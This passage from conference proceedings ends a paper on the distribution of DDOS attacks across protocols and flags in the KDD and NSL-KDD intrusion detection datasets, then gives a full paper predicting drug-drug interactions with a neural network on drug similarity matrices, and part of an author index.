findings were compared across five different classifiers. To the best of the authors’
understanding, the identification of adversarial threats on ANN-based IDSs has not
yet been thoroughly studied.
Ji and Li [11] suggested an IDS based on a deep neural network combined with the FM
methodology. It was implemented on the KDD99 dataset, and the accuracy attained was
about 93.4%. Su et al. [12] proposed a deep learning-based IDS, called BAT, for
detecting various attacks on the network with enhanced accuracy. This model combines
two mechanisms, bidirectional long short-term memory and an attention mechanism, to
capture the vital attributes for the categorization of network traffic. Besides, more
convolutional layers are attached for sample data processing, with a SoftMax
activation function to attain successful classification. This model enhanced the
effectiveness of recognizing anomalies in the network. The NSL-KDD dataset was
utilized for the implementation of the proposed model. Abrar et al. [13] compared
the performance of threat identification in the network through various machine
learning methodologies based on the NSL-KDD dataset. Instead of using the complete
dataset, four sample datasets were derived from the main dataset and utilized for
the comparison. Before deriving the sample data, preprocessing was applied to
discard unnecessary features from NSL-KDD. The work concluded that the random
forest, extra tree classifier, and decision tree methodologies perform better than
the other machine learning methodologies.
Gao et al. [14] researched generating an ensemble technique using machine
learning methodologies. The attained accuracy was promising but not yet at a
good level; nevertheless, the authors' idea of pursuing ensembling methodologies
is appreciable. In this respect, there is a strong need for proper preprocessing
as well as optimized attribute selection. The framework was implemented on the
NSL-KDD dataset. Aljawarneh et al. [15] implemented a hybrid model for
classifying threats in two forms, binary and multi-class classification. The
hybrid model attained an accuracy of 99.81% for binary classification and 98.56%
for multi-class classification, implemented on the NSL-KDD dataset. The model
has two sections: the first deals with the filtering of attributes, and the
second with a combination of various classifiers that helps classify the threats
in the network. Bhattacharjee et al. [16] employed an IDS model in which a
mixture of fuzzy membership functions was applied to a vectorized objective
function along with a genetic algorithm for categorizing the threats in the
network [17]. It was also implemented on the NSL-KDD dataset.
From the above discussion, one can see that active research on intrusion
detection systems that classify the various threats in a network is widely
ongoing. These studies can be grouped by the machine learning and deep learning
methodologies they employ [18]. The popular datasets in this scenario are KDD
and NSL-KDD. Still, a strong basis for the development of intrusion detection
systems needs to be identified [19]. For that purpose, it is necessary to derive
certain recommendations based on the various threats, protocols, services, and
flags. This aspect is considered in the proposed framework.
3 Analysis
This section is organized into two subsections: the first discusses the dataset
and the analysis based on it, and the second presents the recommendations
produced from that analysis.
904 S. Pande et al.
The dataset considered is NSL-KDD, one of the most popular datasets for
intrusion detection systems. That is the main reason for choosing it to analyze
the DDOS threat scenario with respect to the various protocols and its
distribution relative to normal activities. The dataset consists of 42
attributes: 41 features such as protocol, duration, flag, etc., plus the threat
(class) label. The attacks in this dataset can be categorized into DDOS threats,
Probe threats, R2L (Remote to Local) threats, U2R (User to Root) threats, and
normal activities. The analysis was done using MS Excel (Office 365) on the
Windows 10 operating system.
Two datasets are considered in this work: KDD and NSL-KDD. NSL-KDD is extracted
from the KDD dataset and amounts to about 20% of it. The NSL-KDD dataset was
considered in terms of DDOS threats as well as normal activities for analysis
purposes. The DDOS class consists of various sub-classes: apache2, back, land,
neptune, mailbomb, pod, processtable, smurf, teardrop, udpstorm, and worm. A
summary of the KDD and NSL-KDD datasets is provided in Table 1, and the same
information is visualized in Fig. 1.
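The sub-class-to-category mapping described above can be sketched as a small lookup helper. The DDOS sub-class names are the ones listed in the text; the Probe, R2L, and U2R sub-class names follow the commonly used NSL-KDD taxonomy and are assumptions here, as is the helper itself.

```python
# Map raw NSL-KDD attack labels to the coarse threat categories used in
# this analysis. DDOS sub-classes are taken from the text; the other
# three groups follow the common NSL-KDD taxonomy (an assumption).
DDOS = {"apache2", "back", "land", "neptune", "mailbomb", "pod",
        "processtable", "smurf", "teardrop", "udpstorm", "worm"}
PROBE = {"ipsweep", "nmap", "portsweep", "satan", "mscan", "saint"}
R2L = {"ftp_write", "guess_passwd", "imap", "multihop", "phf", "spy",
       "warezclient", "warezmaster", "sendmail", "named",
       "snmpgetattack", "snmpguess", "xlock", "xsnoop", "httptunnel"}
U2R = {"buffer_overflow", "loadmodule", "perl", "rootkit", "ps",
       "sqlattack", "xterm"}

def categorize(label: str) -> str:
    """Return the coarse threat category for a raw attack label."""
    label = label.lower()
    if label == "normal":
        return "Normal"
    for name, group in (("DDOS", DDOS), ("Probe", PROBE),
                        ("R2L", R2L), ("U2R", U2R)):
        if label in group:
            return name
    return "Unknown"
```

With such a mapping, each record's label column can be collapsed to one of the five categories before counting, which is exactly the grouping summarized in Table 1.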
From Fig. 1, one can see that the major proportion of either dataset consists of
normal activities and DDOS threats. It is therefore necessary to study the
consequences of DDOS threats for the network and its various components.
Consider the distribution of DDOS threats and normal activities in each dataset:
the KDD dataset contains 391,458 DDOS threats and the NSL-KDD dataset contains
45,927, as mentioned in Table 1. The distribution of only DDOS and normal
activities in the NSL-KDD and KDD datasets is represented in Fig. 2a, b,
respectively.
From Fig. 2, one can see that the NSL-KDD dataset is much smaller than the
others, whereas the KDD dataset is the largest. Analyzing too small a dataset is
not adequate for network-related issues, whereas analyzing the full KDD dataset
is not feasible in MS Excel due to its size. NSL-KDD is medium-sized, so the
recommendations drawn from it can be generalized for a network. The distribution
of DDOS and normal activities according to protocol in the NSL-KDD dataset is
represented in Fig. 3.
Fig. 2 DDOS vs Normal activities distribution for NSL-KDD and KDD datasets
Fig. 4 The distribution of proportions of DDOS and normal activities in the KDD dataset
From Fig. 3, one can observe the distribution of DDOS and normal activities
across the protocols in the NSL-KDD dataset. The effect of DDOS threats is
observed mostly for the TCP protocol, followed by UDP, with the least effect on
ICMP. However, these are only the numbers of cases per protocol; the comparison
is more convenient in terms of proportions. The proportion is calculated as in
Eq. (1):

Proportion(class, protocol) = Count(class, protocol) / Count(protocol) (1)

where class represents DDOS or normal activities and protocol represents TCP,
UDP, or ICMP. The proportions indicate the prevalence of a class (DDOS or
normal) within a particular protocol. The distribution of these proportions is
represented in Fig. 4.
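A minimal sketch of the proportion calculation in Eq. (1): the per-protocol counts below are hypothetical placeholders, not the figures from the paper's tables.

```python
# Proportion of a class within a protocol, per Eq. (1):
#   proportion(class, protocol) = count(class, protocol) / count(protocol)
# The counts are hypothetical, used only to illustrate the computation.
counts = {
    ("tcp", "ddos"): 42188, ("tcp", "normal"): 53600,
    ("udp", "ddos"): 892,   ("udp", "normal"): 12434,
    ("icmp", "ddos"): 2847, ("icmp", "normal"): 1309,
}

def proportion(cls: str, protocol: str) -> float:
    """Share of `cls` among all records observed for `protocol`."""
    total = sum(v for (p, _), v in counts.items() if p == protocol)
    return counts[(protocol, cls)] / total
```

Note how the picture changes between counts and proportions: TCP has by far the most DDOS records, but once each protocol is normalized by its own total, a protocol with few records (ICMP here) can show a higher DDOS proportion, which is the effect discussed below for Fig. 4.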
Contrary to the raw-count view of the DDOS effect on the protocols, in terms of
proportions the DDOS effect is stronger for both the ICMP and TCP protocols. For
UDP, the DDOS effect remains very low, which implies that the UDP protocol fares
much better than the other two. Similarly, consider how the classes (DDOS and
normal) affect each flag in terms of proportions. The distribution of DDOS and
normal activities over the various flags in NSL-KDD is represented in Fig. 5,
from which one can see that DDOS has a higher effect for flags such as S0, RSTO,
and REJ. The S0 flag indicates that a connection attempt was seen but received
no reply, RSTO indicates that the originator reset the connection, and REJ
indicates that the connection attempt was rejected.
Fig. 5 Distribution of DDOS and normal activities as per the various flags in NSL-KDD
3.2 Recommendations
4 Conclusion
The proposed framework analyzed the KDD and NSL-KDD datasets to identify the
influence of DDOS attacks on various aspects such as protocols, services, and
flags. The generalization would be more effective if the complete dataset were
considered, which would make a good and effective challenge for a big data
scenario. Based on these recommendations, an effective IDS targeting DDOS
attacks can be framed. The analysis can be continued in greater depth to derive
recommendations for the other classes of attacks, namely the Probe, R2L, and
U2R attacks. If effective recommendations can be identified for all these
classes, the most effective intrusion detection system can be framed.
References
1. Ruan, Z., Miao, Y., Pan, L., Patterson, N., & Zhang, J. (2017). Visualization of big data security:
A case study on the KDD99 cup data set. Digital Communications and Networks, 3, 250–259.
2. Ji, H., Kim, D., Shin, D., & Shin, D. (2018). A study on comparison of KDD CUP 99 and NSL-
KDD using artificial neural network. Lecture Notes in Electrical Engineering, 474, 452–457.
3. Ibrahimi, K., & Ouaddane, M. (2017). Management of intrusion detection systems based-
KDD99: Analysis with LDA and PCA. In: International Conference on Wireless Networks and
Mobile Communications (WINCOM) 2017.
4. Othman, S. M., Ba-Alwi, F. M., Alsohybe, N. T., & Al-Hashida, A. Y. (2018). Intrusion detection
model using machine learning algorithm on Big Data environment. Journal of Big Data, 5.
5. Jia, Y., Wang, M., & Wang, Y. (2019). Network intrusion detection algorithm based on deep
neural network. IET Information Security, 13, 48–53.
6. Anand Sukumar, J. V., Pranav, I., Neetish, M. M., & Narayanan, J. (2018). Network intrusion
detection using improved genetic k-means algorithm. In: 2018 International Conference on
Advances in Computing, Communications and Informatics (ICACCI), (pp. 2441–2446).
7. Basnet, R. B., Shash, R., Johnson, C., Walgren, L., & Doleck, T. (2019). Towards detecting
and classifying network intrusion traffic using deep learning frameworks. Journal of Internet
Services and Information Security, 9, 1–17.
8. Kumar, V., Das, A. K., & Sinha, D. (2019). UIDS: A unified intrusion detection system for IoT
environment. Evolutionary Intelligence.
9. Khonde, S., & Ulagamuthalvi, V. (2019). Fusion of feature selection and random forest for
an anomaly-based intrusion detection system. Journal of Computational and Theoretical
Nanoscience, 16, 3603–3607.
10. Pawlicki, M., Choraś, M., & Kozik, R. (2020). Defending network intrusion detection systems
against adversarial evasion attacks. Future Generation Computer Systems, 110, 148–154.
11. Ji, Y., & Li, X. (2020). An efficient intrusion detection model based on deep FM. In Proceedings
on 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control
Conference ITNEC 2020 (pp. 778–783).
12. Su, T., Sun, H., Zhu, J., Wang, S., & Li, Y. (2020). BAT: Deep learning methods on network
intrusion detection using NSL-KDD dataset. IEEE Access, 8, 29575–29585.
13. Abrar, I., Ayub, Z., Masoodi, F., & Bamhdi, A. M. (2020). A machine learning approach for
intrusion detection system on NSL-KDD dataset (pp. 919–924).
14. Gao, X., Shan, C., Hu, C., Niu, Z., & Liu, Z. (2019). An adaptive ensemble machine learning
model for intrusion detection. IEEE Access, 7, 82512–82521.
15. Aljawarneh, S., Aldwairi, M., & Yassein, M. B. (2018). Anomaly-based intrusion detection
system through feature selection analysis and building hybrid efficient model. Journal of
Computer Science, 25, 152–160.
16. Bhattacharjee, P. S., Fujail, A. K. M., & Begum, S. A. (2017). Intrusion detection system for
NSL-KDD data set using vectorised fitness function in genetic algorithm. Advances in
Computational Sciences and Technology, 10, 235–246.
17. Pande S., Khamparia A., Gupta D., & Thanh D. N. H. (2021) DDOS Detection using machine
learning technique. In A. Khanna, A. K. Singh, & A. Swaroop (Eds.), Recent studies on compu-
tational intelligence. Studies in computational intelligence (Vol. 921). Springer. https://doi.org/
10.1007/978-981-15-8469-5_5
18. Pande, S. D., & Khamparia, A. (2019). A review on detection of DDOS attack using machine
learning and deep learning techniques. Think India Journal, 2035–2043.
19. Pande, S., & Gadicha, A. B. (2015). Prevention mechanism on DDOS attacks by using multi-
level filtering of distributed firewalls. International Journal on Recent and Innovation Trends
in Computing and Communication, 3(3). ISSN: 2321-8169.
Drug-Drug Interaction Prediction Based
on Drug Similarity Matrix Using a Fully
Connected Neural Network
Abstract Drug-drug interactions (DDIs) are a major hindrance to providing safe and
inexpensive health care. They generally occur in patients under extensive medication
who must take multiple drugs at a time. DDIs can cause side effects ranging from
mild to severe health issues, reducing patients' quality of life and increasing
hospital healthcare expenses by lengthening recovery periods. To resolve this
problem, many efforts have been made to develop new techniques for DDI prediction.
In this article, we propose a method for predicting DDIs based on drug
similarities, including chemical similarity, distance-based similarity, side
effects, ligand similarity, etc., using a fully connected neural network model.
Our model achieved a competitive ROC AUC score ranging from 0.72 to 0.77 and a
PR AUC from 0.68 to 0.73 when tested on three gold standard datasets under
k-fold cross-validation.
1 Introduction
Combining multiple drugs to treat severe diseases like cancer, AIDS, etc., is becoming
a promising and common approach in the modern era. The main reason for using
multiple drugs to treat a disease is that it increases the efficacy of the treatment
process, and different drugs can tackle different parts of it [1]. However,
these combinations may result in unwanted interactions between the drugs, which can
cause adverse drug reactions [2]. Hence, predicting DDIs is immensely important for
human health [3]. Researchers and organizations worldwide have spent ample
A. Kumar
Goibibo Private Limited, Bangalore, India
M. Sharma (B)
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: moolchand@mait.ac.in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 911
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_74
time and money finding DDI pairs using several in vivo and in vitro experimental
techniques [4]. Experimental determination of DDIs is extremely slow, requiring a
lot of time and money, and usually has low throughput, due to which some
interactions may go unnoticed. Being slow and expensive, these procedures are not
feasible for screening large combinations of drugs. Over the last decade,
numerous new techniques for predicting DDIs have appeared to overcome this
problem.
Vilar et al. propose a protocol for predicting novel DDIs based on the candidates'
similarity with known DDIs [5]. A method to predict DDIs using interaction profile
fingerprints was also proposed by Vilar et al. [6]. A pool of 928 drugs was
considered in this approach, and their interaction profile fingerprints (IPFs)
were calculated; a similarity matrix corresponding to the IPFs was then generated
using the Jaccard index. To calculate predicted interactions, the matrix of
established DDIs was multiplied by the similarity matrix.
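The IPF idea of Vilar et al. [6] can be sketched on toy data: each drug's fingerprint is the set of drugs it is known to interact with, the similarity between two drugs is the Jaccard index of their fingerprints, and candidate scores come from multiplying the known-DDI matrix by the similarity matrix. The three tiny fingerprints and the known-DDI matrix below are hypothetical.

```python
# Jaccard index between two interaction-profile fingerprints (sets).
def jaccard(a: set, b: set) -> float:
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)

# Hypothetical fingerprints: the set of known interaction partners per drug.
ipf = {
    "drugA": {"d1", "d2", "d3"},
    "drugB": {"d2", "d3", "d4"},
    "drugC": {"d9"},
}

drugs = sorted(ipf)  # ["drugA", "drugB", "drugC"]
sim = [[jaccard(ipf[x], ipf[y]) for y in drugs] for x in drugs]

# Score candidates by multiplying a (hypothetical) known-DDI matrix
# by the similarity matrix, as described in the text.
known = [[0, 1, 0], [1, 0, 0], [0, 0, 0]]
score = [[sum(known[i][k] * sim[k][j] for k in range(len(drugs)))
          for j in range(len(drugs))] for i in range(len(drugs))]
```

A high score[i][j] means drug i is known to interact with drugs that are fingerprint-similar to drug j, which is the signal the method thresholds to propose new DDIs.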
Gottlieb et al. present a method to predict DDIs from the structural similarity
and side effects of known drug pairs [7]. Lee et al. propose a model that
predicts DDIs with a feed-forward deep neural network taking reduced similarity
profiles generated by autoencoders as input [8]. Cheng et al. created drug-drug
similarity pairs based on multiple features and applied five predictive models
based on naive Bayes, decision tree, k-nearest neighbor, logistic regression,
and support vector machine [9]. Zhang et al. proposed finding DDIs by applying a
label propagation algorithm to a network of structural and side effect
similarities of drugs [10]. A dependency-based convolutional neural network
(DCNN) for predicting DDIs was proposed by Liu et al. [11]; since most
dependency-based parsers work well only for short sentences, the DCNN was used
to extract DDIs in short sentences, while a CNN-based model extracted DDIs over
long distances. A recursive neural network-based model has been proposed by Lim
et al. for predicting DDIs [12]; it uses a position feature, a subtree
containment feature, and an ensemble method to perform DDI extraction.
We have proposed a model made of a fully connected neural network. It uses as
input an integrated similarity matrix of the kind proposed by Olayan [13], who
presents a heuristic process for obtaining an optimized combination of
similarities from the similarity set. The similarity matrix is built by applying
the heuristic algorithm to multiple similarity features, such as side effects,
off-label side effects, pathways, ligand-based similarity, etc., to remove
redundancy and find the most optimal similarity subset. The subset obtained in
this step is then combined into an integrated similarity matrix of size m × m,
where m is the number of drugs considered. The combination is performed using
similarity network fusion (SNF) [14], which constructs a network of data samples
for each available data type and then fuses them into a single network
representing the complete spectrum of the data. Once the integrated similarity
matrix is generated, we feed it into our dense neural network. The network is
straightforward, consisting of an input layer of 64 neurons, two hidden layers,
and an output layer of two neurons providing a binary output. Details of the
structure and working of the model are discussed in a later section.
We trained and tested our model on three gold standard datasets used in numerous
research works [7, 15–17]. Our model achieved a competitive ROC AUC score
ranging from 0.72 to 0.77 and a PR AUC score from 0.68 to 0.73.
The key highlights of the paper include:
• This paper helps identify interactions between different kinds of drugs
during multidrug treatment of a patient.
• A method to generate and combine similarity matrices of different drug
features is discussed.
• A four-layered neural network model is proposed for predicting the
interaction probability of drugs.
• The model achieved an AUC score ranging from 0.72 to 0.77 on three gold
standard datasets (DS1, DS2, DS3).
2 Dataset
To train and evaluate our model, we used three standard datasets. These datasets
contain a known DDI interaction matrix along with multiple Jaccard similarity
matrices; they were taken from [17]. The first dataset (DS1) consists of 548
drugs whose interactions are represented in an n × n matrix with a zero
diagonal, since the interaction of a drug with itself is not taken into account.
The dataset provides similarity matrices based on eight characteristics
(including chemical similarity, target, enzyme, transporter, pathway,
indication, and side effect data).
The second dataset (DS2) consists of 707 drugs and their interaction matrices,
containing 34,412 interactions in total. Unlike DS1, this dataset only has
interactions based on chemical similarity. The third dataset (DS3) consists of
807 drugs whose interactions are represented as interaction matrices. It
provides seven types of similarity matrices: four based on the anatomical
therapeutic chemical (ATC) classification, and the others based on chemical
similarity, ligand-based similarity, and side effects. Gottlieb et al. have
shown a general procedure for assembling and validating these datasets [7].
The datasets discussed above were created using data extracted from standard
sources such as DrugBank [18], KEGG [19], the drug effect data of Tatonetti et
al. [20], PubChem [21], and SIDER [22].
3 Methodology
This article has proposed a model for predicting DDI using a deep neural network,
taking an integrated similarity vector as input. Creating an integrated similarity matrix
has already been used in previous research works [13, 14]. A heuristic approach for
generating a subset of similarity matrices is proposed by Olayan, which takes care of
redundant data to generate the most optimal subset [13]. Then, the similarity network
fusion(SNF) [14] is applied to the subset to generate data sample networks combined
into a single network for generating an integrated similarity matrix. The vector of
similarity matrix and know interactions was provided as input for our fully connected
neural network. Our network consists of one input layer made of 64 neurons, and
an output layer made up of two neurons for generating binary output, and two fully
connected hidden layers connected sequentially. A dropout of 0.5 was applied in the
hidden layer to prevent overfitting. We used the relu activation function in all layers
except in the output layer, in which case the sigmoid activation function was used for
generating binary output. Our model used binary_crossentropy as the loss function
and adam as the optimizer. The model was trained on the DS1 dataset with a standard
test-train split of 70 and 30%. We found that our model gave better results during our
training process when trained on an integrated similarity matrix compared to when
trained just on chemical similarity. The hyperparameters of the model were tuned
Drug-Drug Interaction Prediction Based on Drug … 915
using tenfold cross-validation. The model’s summary and architecture are provided
in Table 1 and Fig. 1, respectively.
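Given the layer widths stated above (a 64-neuron first layer and a 2-neuron output), the parameter count of such a dense stack can be computed layer by layer as weights plus biases. The hidden widths (32 and 16) and the input dimension (548, the number of DS1 drugs) are illustrative assumptions, since the text does not specify them.

```python
# Parameters of one fully connected layer: weights plus biases.
#   params(n_in, n_out) = n_in * n_out + n_out
def dense_params(n_in: int, n_out: int) -> int:
    return n_in * n_out + n_out

# Assumed widths: 548-dim input -> 64 -> 32 -> 16 -> 2 output.
widths = [548, 64, 32, 16, 2]
total = sum(dense_params(a, b) for a, b in zip(widths, widths[1:]))
print(total)  # 37778 under these assumed widths
```

Dropout adds no parameters of its own; it only zeroes activations at training time, so a count like this depends entirely on the chosen layer widths.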
4 Evaluation
Our model was trained on the DS1 dataset, which contains information on eight
different interaction characteristics. It was evaluated using two metrics: the
area under the receiver operating characteristic curve (ROC AUC) and the area
under the precision-recall curve (PR AUC). The ROC curve [23] is generated by
plotting the true positive rate (Tpr) against the false positive rate (Fpr),
defined in Eqs. (1) and (2); precision and recall are defined in Eqs. (3) and
(4):

Tpr = Tp / (Tp + Fn) (1)

Fpr = Fp / (Fp + Tn) (2)

Precision = Tp / (Tp + Fp) (3)

Recall = Tp / (Tp + Fn) (4)
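These standard confusion-matrix definitions translate directly into code; a minimal sketch with hypothetical counts:

```python
# Metrics from confusion-matrix counts (standard definitions).
def tpr(tp: int, fn: int) -> float:       # true positive rate; same as recall
    return tp / (tp + fn)

def fpr(fp: int, tn: int) -> float:       # false positive rate
    return fp / (fp + tn)

def precision(tp: int, fp: int) -> float:
    return tp / (tp + fp)

# Hypothetical counts: tp=70, fn=30, fp=20, tn=80.
print(tpr(70, 30))        # 0.7
print(fpr(20, 80))        # 0.2
print(precision(70, 20))  # ~0.778
```

Sweeping the decision threshold of the classifier and plotting (Fpr, Tpr) pairs traces the ROC curve, while (recall, precision) pairs trace the precision-recall curve; the AUC values reported below are the areas under those two curves.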
In the experiment, the termination condition was set based on the AUC value: we
stopped training once the AUC peaked on our training dataset. The DS1 dataset
was chosen for training as it is the most complete, containing similarity
matrices based on eight different characteristics. To minimize the chance of
inaccurate prediction scores, we also tested the model on datasets completely
different from the one on which it was trained, by performing a test-train split
of DS1 and introducing the two new datasets DS2 and DS3. The model gave an ROC
AUC score of 0.75 on the test split of DS1; this score rose to 0.77 on DS3 and
showed a slight dip to 0.72 on DS2, whereas the PR AUC score ranged from 0.68 to
0.73. These results are shown in Table 2 and represented as a bar graph in
Fig. 2.

Table 2 Performance evaluation of the model on different datasets

Dataset | ROC AUC | PR AUC
DS1     | 0.75    | 0.73
DS2     | 0.72    | 0.70
DS3     | 0.77    | 0.68
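Stopping once the AUC peaks is a form of early stopping. A minimal patience-based sketch follows; the patience value and the AUC sequence are illustrative, not taken from the experiment.

```python
# Patience-based early stopping on a validation score such as AUC:
# stop once the score has not improved for `patience` consecutive epochs.
def stop_epoch(scores, patience: int = 2) -> int:
    best, best_epoch = float("-inf"), 0
    for epoch, s in enumerate(scores):
        if s > best:
            best, best_epoch = s, epoch
        elif epoch - best_epoch >= patience:
            return epoch          # stop here: no improvement for `patience` epochs
    return len(scores) - 1        # ran to the end without triggering

aucs = [0.61, 0.68, 0.72, 0.75, 0.74, 0.73, 0.73]
print(stop_epoch(aucs))  # 5 (peak was at epoch 3)
```

In practice the peak would be monitored on a held-out validation split rather than the training data, so the stored weights correspond to the best validation AUC.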
References
1. Lucy, D., Roberts, E. O., Corp, N., & Kadam, U. T. (2014). Multi-drug therapy in chronic
condition multimorbidity: A systematic review. Family Practice, 31(6), 654–663. https://doi.
org/10.1093/fampra/cmu056
2. Edwards, I. R., & Aronson, J. K. (2000). Adverse drug reactions: Definitions, diagnosis,
and management. Lancet, 356(9237), 1255–1259. https://doi.org/10.1016/S0140-6736(00)027
99-9 PMID: 11072960.
3. Palleria, C., Di Paolo, A., Giofrè, C., Caglioti, C., Leuzzi, G., Siniscalchi, A., & Gallelli, L.
(2013). Pharmacokinetic drug-drug interaction and their implication in clinical management.
Journal of Research in Medical Sciences: The Official Journal of Isfahan University of Medical
Sciences, 18(7), 601.
4. Boulenc X., Schmider W., Barberan O. (2011). In Vitro/in vivo correlation for drug-drug
interactions. In H. G. Vogel, J. Maas, A. Gebauer (Eds.), Drug discovery and evaluation:
Methods in clinical pharmacology. Springer. https://doi.org/10.1007/978-3-540-89891-7_14.
5. Vilar, S., Uriarte, E., Santana, L., Lorberbaum, T., Hripcsak, G., Friedman, C., & Tatonetti,
N. P. (2014). Similarity-based modelling in large-scale prediction of drug-drug interactions.
Nature Protocols, 9(9), 2147–2163. https://doi.org/10.1038/nprot.2014.151
6. Vilar, S., Uriarte, E., Santana, L., Tatonetti, N. P., & Friedman, C. (2013). Detection of drug-drug
interactions by modelling interaction profile fingerprints. PLoS ONE, 8(3), e58321.
7. Gottlieb, A., Stein, G. Y., Oron, Y., Ruppin, E., & Sharan, R. (2012). INDI: A computational
framework for inferring drug interactions and their associated recommendations. Molecular
System Biology, 8(1), 592.
8. Lee, G., Park, C., & Ahn, J. (2019). Novel deep learning model for more accurate prediction of
drug-drug interaction effects. BMC Bioinformatics, 20, 415. https://doi.org/10.1186/s12859-
019-3013-0
9. Cheng, F., & Zhao, Z. (2014). Machine learning-based prediction of drug-drug interactions by
integrating drug phenotypic, therapeutic, chemical, and genomic properties. Journal of the
American Medical Informatics Association, 21(e2), e278–e286. https://doi.org/10.1136/amiajnl-2013-
002512. PMID: 24644270; PMCID: PMC4173180.
10. Zhang, P., Wang, F., Hu, J., et al. (2015). Label propagation prediction of drug-drug interactions
based on clinical side effects. Science Report, 5, 12339. https://doi.org/10.1038/srep12339
11. Liu, S., Chen, Kai., Chen, Q., & Tang, B. (2016). Dependency-based convolutional neural
network for drug-drug interaction extraction. In 2016 IEEE International Conference on Bioin-
formatics and Biomedicine (BIBM) (pp. 1074-1080). https://doi.org/10.1109/BIBM.2016.782
2671.
12. Lim, S., Lee, K., & Kang, J. (2018). Drug-drug interaction extraction from the literature using
a recursive neural network. PLoS ONE, 13(1), e0190926. https://doi.org/10.1371/journal.pone.
0190926
13. Olayan. R.S., Ashoor, H., & Bajic, V.B. (2018). DDR: Efficient computational method to predict
drug-target interactions using graph mining and machine learning approaches. Bioinformatics
34(7), 1164–1173. https://doi.org/10.1093/bioinformatics/btx731. Erratum in: Bioinformatics.
2018 Nov 1; 34(21), 3779. PMID: 29186331; PMCID: PMC5998943.
14. Wang, B., Mezlini, A. M., Demir, F., Fiume, M., Tu, Z., Brudno, M., Haibe-Kains, B., &
Goldenberg, A. (2014). Similarity network fusion for aggregating data types on a genomic
scale. Nature Methods, 11(3), 333–337. https://doi.org/10.1038/nmeth.2810. PMID: 24464287.
15. Zhang, W., et al. (2017). Predicting potential drug-drug interactions by integrating chemical,
biological, phenotypic and network data. BMC Bioinformatics, 18, 18.
16. Wan, F., Hong, L., Xiao, A., Jiang, T., & Zeng, J. (2018). NeoDTI: Neural integration of neigh-
bour information from a heterogeneous network for discovering new drug-target interactions.
bioRxiv 261396.
17. Rohani, N., & Eslahchi, C. (2019). Drug-drug interaction predicting by neural network using
integrated similarity. Science Report, 9, 13645. https://doi.org/10.1038/s41598-019-50121-3
18. Wishart, D. S., Knox, C., Guo, A. C., Cheng, D., Shrivastava, S., Tzur, D., Gautam, B.,
& Hassanali, M. (2008). DrugBank: A knowledgebase for drugs, drug actions and drug
targets. Nucleic Acids Research, 36(Database issue), D901–D906, https://doi.org/10.1093/nar/
gkm958
19. Kanehisa, M., & Goto, S. (2000). KEGG: Kyoto encyclopedia of genes and genomes. Nucleic
Acids Research, 28(1), 27–30. https://doi.org/10.1093/nar/28.1.27
20. Tatonetti, N. P., Ye, P. P., Daneshjou, R., & Altman, R. B. (2012) Data-driven prediction of
drug effects and interactions. Science Translational Medicine 4(125):125ra31. https://doi.org/
10.1126/scitranslmed.3003377.
21. Kim, S., Thiessen, P. A., Cheng, T., Yu, B., Shoemaker, B. A., Wang, J., Bolton, E. E., Wang, Y.,
& Bryant, S. H. (2016). Literature information in PubChem: associations between PubChem
records and scientific articles. Journal of Cheminformatics, 8, 32. https://doi.org/10.1186/s13
321-016-0142-6
22. Kuhn, M., Letunic, I., Jensen, L. J., & Bork, P. (2016). The SIDER database of drugs
and side effects. Nucleic Acids Research, 44(D1), D1075–D1079. https://doi.org/10.1093/nar/
gkv1075
23. Hajian-Tilaki, K. (2013). Receiver operating characteristic (ROC) curve analysis for medical
diagnostic test evaluation. Caspian Journal of Internal Medicine, 4(2), 627–635.
Author Index
F
B Fraz, Mohammad, 757
Bachate, Ravindra P., 665
Bahadur, Promila, 693, 857
Bhatia, Anshul, 509 G
Bhatia, Rajesh, 291 Garg, Amit Kumar, 645
Bhatt, Arvind Kumar, 1 Garg, Preeti, 315
Bhavani, Dokuparthi Sai Santhoshi, 839 Garg, Srishti, 857
Biradar, Rajashree V., 279 Gazi, Mohammad Danish, 301
Biswas, Sarmista, 423 Goel, Gaurav, 499
Gosain, Anjana, 85, 769
Gourisaria, Mahendra Kumar, 721, 735
C Goyal, S. B., 59
Chakraborty, Sudeshna, 817 Gupta, Arun, 581
Chandra, Girish, 471 Gupta, Ashish, 301
Chandra, Satish, 721 Gupta, Deepak, 899
Chaudhary, Juhi, 409 Gupta, Mayuri, 829
Chauhan, Bhargavi K., 15 Gupta, Megha, 31
Chauhan, Jaisal, 261 Gupta, Mukesh Kumar, 183
Choudhary, Ankur, 605 Gupta, Pallavi, 301
J P
Jacob, Lija, 271 Pande, Sagar, 899
Jain, Shikha, 369 Pandey, Mahima Shanker, 461
Jain, Tanvi, 393 Pandey, Pratibha, 683
Jindal, Rajni, 435 Patel, Dhirenbhai B., 15
Patil, Shashikant, 535
Prabha, Rachna, 683
Prakash, Shiv, 521
K
Pramanik, Rwittika, 735
Kamparia, Aditya, 899
Priyadarshini, Sushree Bibhuprada B., 383,
Kandhoul, Nisha, 127
617
Kashyap, Parul, 341
Kaushik, Vandana Dixit, 247
Khamparia, Aditya, 889
R
Khanna, Ashish, 711
Raghav, S., 49
Khare, Sandali, 735
Rai, Saloni, 645
Khatri, Megha, 169
Rajoriya, Manisha, 301
Kirti, 355
Rajpal, Navin, 355, 369
Koundal, Deepika, 449
Ramachandra, H. V., 49
Krishna, C. Rama, 67
Rama Kishore, R., 31, 315
Kumar, Akshi, 869 Rani, Asha, 879
Kumar, Alok, 911 Rani, Poonam, 93
Kumar, Gaurav, 793 Rani, Sita, 569
Kumar, K. S. Raghu, 279 Rathkanthiwar, Shubhangi, 535
Kumar, Shivam, 817 Ravinder, M., 633
Kumar, Sumit, 499 Reddy, Kandula Balagangadhar, 271
Kurumbanshi, Suresh, 535 Reddy, S. Hareesh, 169
Rishabh, 779
Roy, Ritwik, 749
L
Lutimath, Nagaraj M., 49
S
Sachdeva, Nitin, 869
M Sachdeva, Ravi Kumar, 147
Madan, Kapil, 291 Saha, Anju, 85
Malhotra, Anshu, 435 Sharan, Mudita, 633
Malhotra, Radhika, 1 Sharma, Abhishek, 817
Mangla, Aakash, 237 Sharma, Ashok, 665
Maurya, Archana Sachindeo, 693, 857 Sharma, Megha, 581
Mehta, Purnima Lala, 481 Sharma, Moolchand, 911
Mishra, Anukram, 581 Sharma, Neha, 49
Mishra, Debahuti, 383 Sharma, Priya, 139
Mishra, Prateek, 147 Sharma, Sanjay Kumar, 139
